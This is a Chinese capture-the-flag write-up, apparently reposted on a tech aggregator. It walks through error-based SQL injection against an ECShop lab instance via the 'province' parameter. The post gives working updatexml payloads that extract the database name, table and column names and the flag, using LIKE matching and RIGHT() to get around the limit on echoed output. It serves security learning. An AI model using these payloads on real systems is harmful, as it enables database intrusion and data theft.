IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 大数据 -> 安鸾靶场 宽字符注入02 靶场练习 详细过程及解决问题笔记 -> 正文阅读

[大数据]安鸾靶场 宽字符注入02 靶场练习 详细过程及解决问题笔记

题目

网站URL ECSHOP演示站 - Powered by ECShop

目录

?

笔记

?过程

进入sql注入页面

问题 判断闭合符

sql注入下的模糊查询

?right 语法爆字段值


?

笔记

对现在我来说难度其实不大,但题目考察的一些细节要求比较高。

首先把我遇到的问题 一 一 列出。(在下面解题的过程会一 一 解决)

  1. 题目虽然是叫宽字符注入,但实际考察的是报错注入 (挂羊头卖狗肉)
  2. 这个网站很大,注入点很难找(我也是看一位师傅的write up)
  3. 自己没有用到 除 ' '? 之外的闭合符,而本题出现了另一个闭合符 () (缺少经验)
  4. 找到注入点后,由于要在burpsuite中点击 follow redirection 追踪到重定向页面才能看到报错回显 导致无法用sqlmap 跑 所以才出现后面的问题
  5. 查询到数据库名后 ,由于每次报错注入的回显内容长度有限制,导致不能一次性爆出所有表,只能通过 修改 limit 后面的参数慢慢爆
  6. 没有学会在 mysql 下 sql注入的模糊查询语法
  7. 爆出字段名为flag 后,由于回显内容长度的限制,还有小部分 flag值没有爆出来,最后学会用 right 和 left 语法

?过程

进入sql注入页面

注册→登陆→点击一个商品手机→加入购物车→点击结算中心→修改收货人信息→用BP开始抓包→点击配送至这个地址

把抓的包放入repeater 模块

province 为注入点

?

?

问题 判断闭合符

SQL注入原理及如何判断闭合符_大大大蜜蜂的博客-CSDN博客_sql注入怎么判断闭合方式

在参数后面输入一个单引号'? 发包后,点击 刚出现的 follow direaction 按钮进入重定向界面

?

sql注入下的模糊查询

还是需要将自己的mysql知识 尽量的运用到实战上,不能光想着 复制别人单一的sql注入语句,不自己独立思考一定是走不远的

https://www.cnblogs.com/-lin-x-c-/p/10375412.html
?

由上方链接我们得知语法 and +(表名,字段名)like = '%关键字%'

下面会把他加到我们的报错注入语句中

爆数据库

2')%20and%20updatexml(1,concat(0x7e,database(),0x7e),1)#

爆表名

2')%20and%20updatexml(1,concat(0x7e,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema%3d"ecshop"%20limit%200,1),0x7e),1)#

?

爆出3个无关表名 还有一个不完整。。。。。。

昨天头铁 通过修改limit 的值一直去重复,40多次才爆出来

下面利用模糊查询

?

2') and updatexml(1,concat(0x7e,(select table_name  from information_schema.tables where table_schema="ecshop" and table_name like '%flag%'),0x7e),1)#

?模糊查询爆字段名

2') and updatexml(1,concat(0x7e,(select column_name  from information_schema.columns where table_name="ecs_flag" and column_name like '%flag%'),0x7e),1)#

?right 语法爆字段值

MySQL RIGHT()用法及代码示例 - 纯净天空

由于我们直接用普通语句查询,我们得到的flag是不完整的,而这里又不能通过limit 语法一个一个字节来爆,但是mysql 提供了一个 right 函数,可以从右往左爆字符串,这样就能把我们缺失的一小部分flag的值爆出。

?正常方法

2') and updatexml(1,concat(0x7e,(select flag from ecs_flag ),0x7e),1)#

结果

?right 语法

2')  and updatexml(1,concat(0x7e,(select(group_concat((right(flag,20)))) from (ecs_flag) ),0x7e),1)#

?

?

去除重复字段即可得到flag。

参考链接

SQL注入:宽字符注入_zh的博客-CSDN博客

SQL注入原理及如何判断闭合符_大大大蜜蜂的博客-CSDN博客_sql注入怎么判断闭合方式

mysql中模糊查询的四种用法: - 林小某lin - 博客园

MySQL RIGHT()用法及代码示例 - 纯净天空

天天学这么累打把游戏不过分把

?

  大数据 最新文章
实现Kafka至少消费一次
亚马逊云科技:还在苦于ETL?Zero ETL的时代
初探MapReduce
【SpringBoot框架篇】32.基于注解+redis实现
Elasticsearch:如何减少 Elasticsearch 集
Go redis操作
Redis面试题
专题五 Redis高并发场景
基于GBase8s和Calcite的多数据源查询
Redis——底层数据结构原理
上一篇文章      下一篇文章      查看所有文章
加:2022-02-07 13:47:24  更:2022-02-07 13:49:20 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/24 12:54:15-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码